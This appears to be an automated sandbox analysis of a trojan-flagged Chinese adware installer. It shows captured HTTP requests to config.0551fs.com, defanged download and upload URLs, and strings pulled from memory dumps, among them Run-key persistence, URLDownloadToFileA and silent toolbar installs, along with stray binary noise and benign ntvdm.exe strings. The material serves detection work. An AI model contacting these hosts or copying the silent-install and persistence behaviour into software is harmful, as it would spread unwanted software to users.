%b..I.3..0.(..|?.'...RE...@.(...a...i.....!....t.3#.\.>x....k.}....
...W?.CqrX.....M.N.m~.....Z...-.sK.E...-l<.\|.`-.......z.=.,".....Q
H?g.-)QDb..6E2&..,..D:..R.R:...RE...@.(...a...i.....!....t.3#.......w.
.WX.\.....R.R:..qE.0.J.|.(.....<Rx%W.'.KH`....WDKF......%......h.0J
....|.....e. .......8.L.]7.w...}.v..N?. F.m..].......8,._..."..n7.
GET /stat.htm?id=1255160857&r=&lg=en-us&ntime=none&cnzz_eid=336905316-1436411426-&showp=1916x902&t=&h=1&rnd=1494402114 HTTP/1.1
Accept: */*
Referer: hXXp://config.0551fs.com/Public/config/xlxc/install_begin.html?567015
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: oz.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.4.6
Date: Thu, 09 Jul 2015 03:10:27 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 09 Mar 2015 09:01:02 GMT
Connection: close
Accept-Ranges: bytesGIF89a.............!.......,...........D..;..
GET /rs2012/RsPcVer12.xml HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: rsup10.rising.com.cn
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 663
Content-Type: text/xml
Last-Modified: Thu, 09 Jul 2015 02:20:22 GMT
Accept-Ranges: bytes
ETag: W/"489dfeceedb9d01:df1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Jul 2015 03:10:51 GMT...<?xml version="1.0" encoding="utf-8"?>..<RISING>.. <
;PRODUCT NAME="Rav" VERSION="24.00.44.04" REBOOTVER="24.00.00.00">.
. </PRODUCT>.. <URLLIST>.. <ITEM KEY="Validate">
;hXXp://rsup10.rising.com.cn/Register/Validate/PageInfo/RavRequest2012
.aspx</ITEM>.. <ITEM KEY="Download">hXXp://download.ris
ing.net.cn/rs2012/pcver/</ITEM>.. <ITEM KEY="Finish"> h
ttp://rsup10.rising.com.cn/Register/Validate/PageInfo/RequestFinished2
012.aspx</ITEM>.. <ITEM KEY="Overtime"> hXXp://rsup10.r
ising.com.cn/Register/Validate/PageInfo/SnGetOverTime.aspx</ITEM>
;.. <ITEM KEY="Stat">hXXp://cloud.rising.com.cn/productstat/p
roductStat.aspx</ITEM>.. </URLLIST>..</RISING>
t>....
GET /Public/conf/open/1/35_1_0_1_1/11.jpg HTTP/1.1
Host: config.0551fs.com
Accept:
Referer: hXXp://config.0551fs.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)
Range: bytes=0-
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 09 Jul 2015 03:10:14 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->....
The Trojan connects to the servers at the folowing location(s):
Map
Strings from Dumps
%original file name%.exe_1312:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss2.tmp\3.dll
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss2.tmp\3.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss2.tmp\3.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss2.tmp\3.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss2.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss2.tmp
nss2.tmp
nss2.tmp
071ab1b0a4a2577a7f7500b0849.exe
071ab1b0a4a2577a7f7500b0849.exe
f071ab1b0a4a2577a7f7500b0849.exe
f071ab1b0a4a2577a7f7500b0849.exe
c:\%original file name%.exe
c:\%original file name%.exe
%Program Files%\ytda
%Program Files%\ytda
%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
9%xNMAV
9%xNMAV
.bH0h
.bH0h
\L9%C&
\L9%C&
Zq.yS.
Zq.yS.
Nullsoft Install System v2.45
Nullsoft Install System v2.45
%original file name%.exe_1312_rwx_10004000_00001000:
callback%d
callback%d
SinaInstall_567015.exe_1296:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
F%D,3
F%D,3
MFC42.DLL
MFC42.DLL
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyA
RegOpenKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
MSVCP60.dll
MSVCP60.dll
GdipSetImageAttributesColorKeys
GdipSetImageAttributesColorKeys
gdiplus.dll
gdiplus.dll
NETAPI32.dll
NETAPI32.dll
imagehlp.dll
imagehlp.dll
WS2_32.dll
WS2_32.dll
VERSION.dll
VERSION.dll
IMM32.dll
IMM32.dll
SHLWAPI.dll
SHLWAPI.dll
DeleteUrlCacheEntry
DeleteUrlCacheEntry
WININET.dll
WININET.dll
MSIMG32.dll
MSIMG32.dll
PSAPI.DLL
PSAPI.DLL
GDI32.dll
GDI32.dll
COMCTL32.dll
COMCTL32.dll
LZMA.dll
LZMA.dll
_Key_End_
_Key_End_
_Key_Data_
_Key_Data_
_Key_Begin_
_Key_Begin_
Location: %s
Location: %s
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
HTTP/1.1
HTTP/1.1
hXXp://
hXXp://
kernel32.dll
kernel32.dll
%s\%s
%s\%s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Range: bytes=%d-%d
Range: bytes=%d-%d
Range: bytes=%d-
Range: bytes=%d-
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)
Referer: %s
Referer: %s
hXXp://config.0551fs.com/
hXXp://config.0551fs.com/
Host: %s
Host: %s
GET %s HTTP/1.1
GET %s HTTP/1.1
%s %d
%s %d
-%s?id=%s
-%s?id=%s
hp_win7_x86.dll",Show
hp_win7_x86.dll",Show
hp_win7_x64.dll",Show
hp_win7_x64.dll",Show
hp_xp_x86.dll",Show
hp_xp_x86.dll",Show
soft.ini
soft.ini
SinashowClient.exe
SinashowClient.exe
SinaService.exe
SinaService.exe
hXXp://ok.sina.com.cn/
hXXp://ok.sina.com.cn/
URLInfoAbout
URLInfoAbout
uninstall.exe
uninstall.exe
VersionConfig.xml
VersionConfig.xml
%s _DeskTop_%s|%s|%s
%s _DeskTop_%s|%s|%s
DeskTopPop.exe
DeskTopPop.exe
%s ID:%s
%s ID:%s
%s _InSetUP_ %s %s %s %s %s
%s _InSetUP_ %s %s %s %s %s
Kpclick.ini
Kpclick.ini
%d,%d,%d,%d,%d,%d
%d,%d,%d,%d,%d,%d
hXXp://config.0551fs.com/Public/conf/open/1/%s_%s/11.jpg
hXXp://config.0551fs.com/Public/conf/open/1/%s_%s/11.jpg
hXXp://config.0551fs.com/Public/conf/open/1/%s_%s/10.jpg
hXXp://config.0551fs.com/Public/conf/open/1/%s_%s/10.jpg
hXXp://config.0551fs.com/Public/conf/resource_donum.xml
hXXp://config.0551fs.com/Public/conf/resource_donum.xml
_kprd%d_%d.xml
_kprd%d_%d.xml
__KPLINK__ %s %s %s %s %s
__KPLINK__ %s %s %s %s %s
kplink.exe
kplink.exe
KpInjectCpaData
KpInjectCpaData
\ajax32.exe
\ajax32.exe
\ajax64.exe
\ajax64.exe
unrar.dll
unrar.dll
%s%ld
%s%ld
hXXp://config.0551fs.com/Public/conf/conf_301page/sinashow.html
hXXp://config.0551fs.com/Public/conf/conf_301page/sinashow.html
hXXp://ok.sina.com.cn/,
hXXp://ok.sina.com.cn/,
%d,%d
%d,%d
view_more_url
view_more_url
url_on_cancle_install
url_on_cancle_install
hXXp://config.0551fs.com/Public/conf/c-lock/2/%s_%s/%s.xml
hXXp://config.0551fs.com/Public/conf/c-lock/2/%s_%s/%s.xml
%s?%s
%s?%s
D:\Program Files\
D:\Program Files\
QueryInterface failed! ctrl: %d
QueryInterface failed! ctrl: %d
Can't find the ctrl: %d
Can't find the ctrl: %d
img.rar
img.rar
hXXp://down.0551fs.com/xlxc/img/%s/img.png
hXXp://down.0551fs.com/xlxc/img/%s/img.png
skinconfig.ini
skinconfig.ini
%s %s %s %s %[^
%s %s %s %s %[^
application/x-www-form-urlencoded
application/x-www-form-urlencoded
/upload.php
/upload.php
upload.0551fs.com
upload.0551fs.com
hXXp://config.0551fs.com/Public/conf/cybercafe_check/index.xml
hXXp://config.0551fs.com/Public/conf/cybercafe_check/index.xml
%s%s%s
%s%s%s
hXXp://config.0551fs.com/Public/conf/
hXXp://config.0551fs.com/Public/conf/
/@1/@2/@3.xml
/@1/@2/@3.xml
%s_%s
%s_%s
hXXp://ok.sina.com.cn/?id=%s
hXXp://ok.sina.com.cn/?id=%s
\soft.ini
\soft.ini
SystemConfig\setting.ini
SystemConfig\setting.ini
hXXp://tj.0551fs.com/report/
hXXp://tj.0551fs.com/report/
Statistics.dll
Statistics.dll
\InStaller.ini
\InStaller.ini
area_url
area_url
resource_url
resource_url
new_icon_url
new_icon_url
max_num_exe
max_num_exe
%d,%d|%d,%d
%d,%d|%d,%d
open_key
open_key
icon_url
icon_url
url_check
url_check
hXXp://config.0551fs.com/Public/Configs/uninstall_end.html
hXXp://config.0551fs.com/Public/Configs/uninstall_end.html
hXXp://config.0551fs.com/Public/Configs/uninstall_begin.html
hXXp://config.0551fs.com/Public/Configs/uninstall_begin.html
hXXp://config.0551fs.com/Public/Configs/v5_install_close.html
hXXp://config.0551fs.com/Public/Configs/v5_install_close.html
hXXp://config.0551fs.com/Public/Configs/index.html
hXXp://config.0551fs.com/Public/Configs/index.html
hXXp://config.0551fs.com/Public/Configs/index2.html
hXXp://config.0551fs.com/Public/Configs/index2.html
hXXp://config.0551fs.com/Public/Configs/install_end.html
hXXp://config.0551fs.com/Public/Configs/install_end.html
hXXp://config.0551fs.com/Public/config/xlxc/install_begin.html
hXXp://config.0551fs.com/Public/config/xlxc/install_begin.html
/index.php
/index.php
XML_URL_TP
XML_URL_TP
v5.tongji.kuping.cc
v5.tongji.kuping.cc
downURL
downURL
hXXp://down.shuyeer.net/kptoolbar/kptoolbar_b_50.exe
hXXp://down.shuyeer.net/kptoolbar/kptoolbar_b_50.exe
KPToolBarSilence.exe
KPToolBarSilence.exe
UniversalMini.exe
UniversalMini.exe
KP4Mini.exe
KP4Mini.exe
Kp_BootClr.exe
Kp_BootClr.exe
soft.exe
soft.exe
installedSoftInfo.ini
installedSoftInfo.ini
Uninstall\installedSoftInfo.ini
Uninstall\installedSoftInfo.ini
%s?id=%s&class=silence
%s?id=%s&class=silence
version.ini
version.ini
.kptheme
.kptheme
.kpscr
.kpscr
.kplgui
.kplgui
.kpicon
.kpicon
.kpcur
.kpcur
.kprar
.kprar
%s\%s,%d
%s\%s,%d
%s\KpInstallTheme.exe
%s\KpInstallTheme.exe
%s %%1
%s %%1
%s\Shell\Open\Command
%s\Shell\Open\Command
%s\Shell
%s\Shell
%s\DefaultIcon
%s\DefaultIcon
0900936iso-ir-581028598iso_8859-81201255iso_8859-8-i1200932cswindows31j
0900936iso-ir-581028598iso_8859-81201255iso_8859-8-i1200932cswindows31j
0628597greek81201258windows-1258
0628597greek81201258windows-1258
1201257windows-12570738598logical
1201257windows-12570738598logical
1201256windows-12560651932euc-jp
1201256windows-12560651932euc-jp
1201255windows-1255
1201255windows-1255
2701143x-ebcdic-finlandsweden-euro1201254windows-1254
2701143x-ebcdic-finlandsweden-euro1201254windows-1254
0801251x-cp12511201253windows-12531400949ks_c_5601_19871528599iso_8859-9:1989
0801251x-cp12511201253windows-12531400949ks_c_5601_19871528599iso_8859-9:1989
0801250x-cp12501201252windows-1252
0801250x-cp12501201252windows-1252
1201251windows-12511528598iso_8859-8:1988
1201251windows-12511528598iso_8859-8:1988
1201250windows-12502301149x-ebcdic-icelandic-euro
1201250windows-12502301149x-ebcdic-icelandic-euro
1150220iso-2022-jp1100874windows-874
1150220iso-2022-jp1100874windows-874
1901145x-ebcdic-spain-euro1620127iso_646.irv:1991
1901145x-ebcdic-spain-euro1620127iso_646.irv:1991
0551932x-euc1250221_iso-2022-jp1000932csshiftjis
0551932x-euc1250221_iso-2022-jp1000932csshiftjis
http-equiv
http-equiv
=\/?!"';
=\/?!"';
(%d nulls removed)
(%d nulls removed)
length %d
length %d
to length %d
to length %d
to %d bytes
to %d bytes
\InStaller_prompt.ini
\InStaller_prompt.ini
RARSetPassword
RARSetPassword
CWebBrowser2
CWebBrowser2
colorkey
colorkey
isshow
isshow
layer_%d
layer_%d
dddddd
dddddd
m_kbt_cancel.rect %d,%d,%d,%d pt %d,%d
m_kbt_cancel.rect %d,%d,%d,%d pt %d,%d
m_kbt_sure.rect %d,%d,%d,%d pt %d,%d
m_kbt_sure.rect %d,%d,%d,%d pt %d,%d
m_kbt_close.rect %d,%d,%d,%d pt %d,%d
m_kbt_close.rect %d,%d,%d,%d pt %d,%d
SYSTEM\CurrentControlSet\Control\Keyboard Layouts
SYSTEM\CurrentControlSet\Control\Keyboard Layouts
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
\*.lnk
\*.lnk
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
Content-Type: %s
Content-Type: %s
U_kprd7_93.xml
U_kprd7_93.xml
@.reloc
@.reloc
GetProcessWindowStation
GetProcessWindowStation
GetCPInfo
GetCPInfo
ntdll.dll
ntdll.dll
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
KERNEL32.DLL
KERNEL32.DLL
WUSER32.DLL
WUSER32.DLL
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}
(*.*)
(*.*)
1.0.1.1
1.0.1.1
InStaller.EXE
InStaller.EXE
ntvdm.exe_680:
.text
.text
`.data
`.data
.rsrc
.rsrc
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
ADVAPI32.dll
ADVAPI32.dll
GDI32.dll
GDI32.dll
USER32.dll
USER32.dll
SoftPC
SoftPC
mscoree.dll
mscoree.dll
Please contact the application's support team for more information.
Please contact the application's support team for more information.
GetProcessWindowStation
GetProcessWindowStation
user32.dll
user32.dll
BIOS keyboard buffer overflow
BIOS keyboard buffer overflow
hardware keyboard buffer overflow
hardware keyboard buffer overflow
%s Mouse %d.01 already installed
%s Mouse %d.01 already installed
%s Mouse %d.01 installed
%s Mouse %d.01 installed
d:\xpsp\base\mvdm\softpc.new\host\src\nt_timer.c
d:\xpsp\base\mvdm\softpc.new\host\src\nt_timer.c
d:\xpsp\base\mvdm\softpc.new\host\src\nt_eoi.c
d:\xpsp\base\mvdm\softpc.new\host\src\nt_eoi.c
C:\IBMBIO.SYS
C:\IBMBIO.SYS
C:\IO.SYS
C:\IO.SYS
C:\IBMDOS.SYS
C:\IBMDOS.SYS
C:\MSDOS.SYS
C:\MSDOS.SYS
\ntio404.sys
\ntio404.sys
\ntio411.sys
\ntio411.sys
\ntio412.sys
\ntio412.sys
\ntio804.sys
\ntio804.sys
\ntio.sys
\ntio.sys
VJOY.DLL
VJOY.DLL
%s %lxh
%s %lxh
d:\xpsp\base\mvdm\softpc.new\host\src\nt_com.c
d:\xpsp\base\mvdm\softpc.new\host\src\nt_com.c
d:\xpsp\base\mvdm\softpc.new\host\src\config.c
d:\xpsp\base\mvdm\softpc.new\host\src\config.c
Software\Microsoft\Windows NT\CurrentVersion\WOW\Console
Software\Microsoft\Windows NT\CurrentVersion\WOW\Console
\\.\$VDMLPT2
\\.\$VDMLPT2
\\.\$VDMLPT3
\\.\$VDMLPT3
\\.\$VDMLPT1
\\.\$VDMLPT1
FONT.NT
FONT.NT
\ega.cpi
\ega.cpi
d:\xpsp\base\mvdm\softpc.new\host\src\nt_fulsc.c
d:\xpsp\base\mvdm\softpc.new\host\src\nt_fulsc.c
Drive %c:
Drive %c:
Incompatible DOS diskette, C H R N = %d %d %d %d
Incompatible DOS diskette, C H R N = %d %d %d %d
\\.\A:
\\.\A:
\\.\?:
\\.\?:
d:\xpsp\base\mvdm\softpc.new\host\src\nt_event.c
d:\xpsp\base\mvdm\softpc.new\host\src\nt_event.c
WINDOWS VMM 4.0
WINDOWS VMM 4.0
WINDOWS NT 3.1
WINDOWS NT 3.1
WINDOWS 386 3.0
WINDOWS 386 3.0
WINDOWS 286 3.0
WINDOWS 286 3.0
\_default.pif
\_default.pif
d:\xpsp\base\mvdm\softpc.new\host\src\nt_det.c
d:\xpsp\base\mvdm\softpc.new\host\src\nt_det.c
VrRemoveOpenNamedPipeInfo
VrRemoveOpenNamedPipeInfo
VrConvertLocalNtPipeName
VrConvertLocalNtPipeName
VrAddOpenNamedPipeInfo
VrAddOpenNamedPipeInfo
VrIsNamedPipeHandle
VrIsNamedPipeHandle
VrIsNamedPipeName
VrIsNamedPipeName
VrWriteNamedPipe
VrWriteNamedPipe
VrReadNamedPipe
VrReadNamedPipe
midiOutShortMsg
midiOutShortMsg
midiOutLongMsg
midiOutLongMsg
WINMM.DLL
WINMM.DLL
d:\xpsp\base\mvdm\softpc.new\host\src\nt_hosts.c
d:\xpsp\base\mvdm\softpc.new\host\src\nt_hosts.c
NtDeviceIoControlFile failed %x
NtDeviceIoControlFile failed %x
d:\xpsp\base\mvdm\softpc.new\host\src\nt_sec.c
d:\xpsp\base\mvdm\softpc.new\host\src\nt_sec.c
SoftPc: NtDeCommitVirtualMemory failed !!!! Status = %lx
SoftPc: NtDeCommitVirtualMemory failed !!!! Status = %lx
NTVDMD.DLL
NTVDMD.DLL
Check Keyboard Status
Check Keyboard Status
\ntdos404.sys
\ntdos404.sys
\ntdos411.sys
\ntdos411.sys
\ntdos412.sys
\ntdos412.sys
\ntdos804.sys
\ntdos804.sys
\ntdos.sys
\ntdos.sys
demDosDispCall %s
demDosDispCall %s
config.nt
config.nt
PIPE
PIPE
%c:%sNUL
%c:%sNUL
Software\Microsoft\Windows\CurrentVersion\Setup
Software\Microsoft\Windows\CurrentVersion\Setup
Unimplemented SVC %d
Unimplemented SVC %d
Software\Microsoft\Windows NT\CurrentVersion\WOW\CmdLine
Software\Microsoft\Windows NT\CurrentVersion\WOW\CmdLine
%s=%s%s /p %s\system32
%s=%s%s /p %s\system32
%s=%3.3u,%3.3u,%s\system32\%s.sys%s
%s=%3.3u,%3.3u,%s\system32\%s.sys%s
KEYB
KEYB
\KEYBOARD.SYS
\KEYBOARD.SYS
\KEYJ31.SYS
\KEYJ31.SYS
\KEY02.SYS
\KEY02.SYS
\KEY01.SYS
\KEY01.SYS
\KEYAX.SYS
\KEYAX.SYS
%s,%d,%s
%s,%d,%s
\KB16.COM
\KB16.COM
DosKeybIDs
DosKeybIDs
System\CurrentControlSet\Control\Keyboard Layout\
System\CurrentControlSet\Control\Keyboard Layout\
DosKeybCodes
DosKeybCodes
00000409
00000409
Software\Microsoft\Windows NT\CurrentVersion\WOW\Compatibility
Software\Microsoft\Windows NT\CurrentVersion\WOW\Compatibility
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
ega.rom
ega.rom
vga.rom
vga.rom
v7vga.rom
v7vga.rom
bios4.rom
bios4.rom
bios1.rom
bios1.rom
profile.spc
profile.spc
.spcprofile
.spcprofile
d:\xpsp\base\mvdm\softpc.new\host\src\x86_emm.c
d:\xpsp\base\mvdm\softpc.new\host\src\x86_emm.c
CS:x IP:x OP:x x x x x
CS:x IP:x OP:x x x x x
ntvdm.pdb
ntvdm.pdb
Ut.Ht$Ht
Ut.Ht$Ht
ItKIt9It.IIt
ItKIt9It.IIt
tK
tK
HHt7Ht.Ht
HHt7Ht.Ht
YYt%F
YYt%F
SSSSSh
SSSSSh
s*f;O%s$
s*f;O%s$
V
V
t.HtHHt(Ht
t.HtHHt(Ht
GetCPInfo
GetCPInfo
NtEnumerateValueKey
NtEnumerateValueKey
NtOpenKey
NtOpenKey
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegQueryInfoKeyA
RegQueryInfoKeyA
RegOpenKeyExA
RegOpenKeyExA
GetConsoleOutputCP
GetConsoleOutputCP
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetWindowsDirectoryA
GetWindowsDirectoryA
SetConsoleKeyShortcuts
SetConsoleKeyShortcuts
VDMConsoleOperation
VDMConsoleOperation
GetConsoleKeyboardLayoutNameA
GetConsoleKeyboardLayoutNameA
EnumWindows
EnumWindows
GetKeyState
GetKeyState
VkKeyScanW
VkKeyScanW
MapVirtualKeyA
MapVirtualKeyA
GetKeyboardType
GetKeyboardType
NtQueryValueKey
NtQueryValueKey
GetProcessHeap
GetProcessHeap
ntvdm.exe
ntvdm.exe
SoftPcEoi
SoftPcEoi
cmdCheckTemp
cmdCheckTemp
cmdCheckTempInit
cmdCheckTempInit
demIsShortPathName
demIsShortPathName
'?--?1-?6-?:-??-??-:?-6?-1?--?1-?6-?:-??-:?-6?-1?--?--?1-?6-?:-??-:?-6?-1?
'?--?1-?6-?:-??-??-:?-6?-1?--?1-?6-?:-??-:?-6?-1?--?--?1-?6-?:-??-:?-6?-1?
$$$(((---222888???
$$$(((---222888???
!"#$%&'(
!"#$%&'(
SoftPC-AT Version 3
SoftPC-AT Version 3
89:;?
89:;?
autoexec.nt
autoexec.nt
00030
00030
30333
30333
?0?3???
?0?3???
!"#$%&'()
!"#$%&'()
Userenv.dll
Userenv.dll
Software\Microsoft\Windows NT\CurrentVersion\Terminal Server
Software\Microsoft\Windows NT\CurrentVersion\Terminal Server
%SystemRoot%
%SystemRoot%
\System32\command.com
\System32\command.com
%System%\ntvdm.exe
%System%\ntvdm.exe
\\.\B:
\\.\B:
COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
%WinDir%
%WinDir%
NTVDM.EXE
NTVDM.EXE
5.1.2600.5512 (xpsp.080413-2111)
5.1.2600.5512 (xpsp.080413-2111)
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
5The NTVDM CPU has encountered an illegal instruction."Internal error in NTVDM procedure.#NTVDM does not support a ROM BASIC.BFailure to allocate the requested number of Expanded Memory pages.*A continuous RESET state has been entered.,The CMOS file cmos.ram could not be created.,The CMOS file cmos.ram could not be updated.
5The NTVDM CPU has encountered an illegal instruction."Internal error in NTVDM procedure.#NTVDM does not support a ROM BASIC.BFailure to allocate the requested number of Expanded Memory pages.*A continuous RESET state has been entered.,The CMOS file cmos.ram could not be created.,The CMOS file cmos.ram could not be updated.
LAn installation file required by NTVDM is missing, execution must terminate.
LAn installation file required by NTVDM is missing, execution must terminate.
Insufficient memory resources.=The NTVDM CPU has encountered an unsupported 386 instruction.TThe EMM command line in your config.nt contains invalid parameters or syntax errors.5The NTVDM CPU has encountered an unhandled exception.t
Insufficient memory resources.=The NTVDM CPU has encountered an unsupported 386 instruction.TThe EMM command line in your config.nt contains invalid parameters or syntax errors.5The NTVDM CPU has encountered an unhandled exception.t
MS-DOS program files must end with the extension .EXE, .COM, or .BAT.
MS-DOS program files must end with the extension .EXE, .COM, or .BAT.
vAn application has attempted to %s, which cannot be supported. This may cause the application to function incorrectly./directly access an incompatible diskette format
vAn application has attempted to %s, which cannot be supported. This may cause the application to function incorrectly./directly access an incompatible diskette format
16 bit Windows Subsystem
16 bit Windows Subsystem
VThe system file is not suitable for running MS-DOS and Microsoft Windows applications."Memory error during intialization.
VThe system file is not suitable for running MS-DOS and Microsoft Windows applications."Memory error during intialization.
Unable to lock for exclusive access. Another application may be using the drive. When the other application has finished using the drive you may retry the operation.
Unable to lock for exclusive access. Another application may be using the drive. When the other application has finished using the drive you may retry the operation.
Drive %c: ZThe Application attempted to enable DOS graphics mode. DOS graphics mode is not supported.
Drive %c: ZThe Application attempted to enable DOS graphics mode. DOS graphics mode is not supported.
Function failed$NTVDM has encountered a System Error*Driver does not support selected Baud Rate
Function failed$NTVDM has encountered a System Error*Driver does not support selected Baud Rate
ntvdm.exe_680_rwx_00000000_00010000:
C:\SETUP_~1.EXE
C:\SETUP_~1.EXE
SCS4.TMP
SCS4.TMP
86.EXE
86.EXE
SETUP_~1EXE
SETUP_~1EXE
."/\[]:| =;,
."/\[]:| =;,
c:\wina20.386
c:\wina20.386
%WinDir%\SYSTEM32\COUNTRY.SYS
%WinDir%\SYSTEM32\COUNTRY.SYS
89:;?
89:;?
1234567890-=
1234567890-=
!@#$%^&*()_
!@#$%^&*()_
789-456 1230.
789-456 1230.
!"#$%&,-./012
!"#$%&,-./012
%WinDir%\SYSTEM32\COMMAND.COM
%WinDir%\SYSTEM32\COMMAND.COM
m32\DOSX.EXE
m32\DOSX.EXE
%File allocation table bad, drive %1
%File allocation table bad, drive %1
Invalid COMMAND.COM
Invalid COMMAND.COM
!Press any key to continue . . .
!Press any key to continue . . .
Cannot execute %1
Cannot execute %1
Error in EXE file
Error in EXE file
%WinDir%\TEMP\scs4.tmp
%WinDir%\TEMP\scs4.tmp
arameter vaCOMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
arameter vaCOMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
OS=Windows_NT
OS=Windows_NT
PATH=C:\Perl\site\bin;C:\Perl\bin;%System%;%WinDir%;%WinDir%\System32\Wbem;c:\PROGRA~1\WIRESH~1
PATH=C:\Perl\site\bin;C:\Perl\bin;%System%;%WinDir%;%WinDir%\System32\Wbem;c:\PROGRA~1\WIRESH~1
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
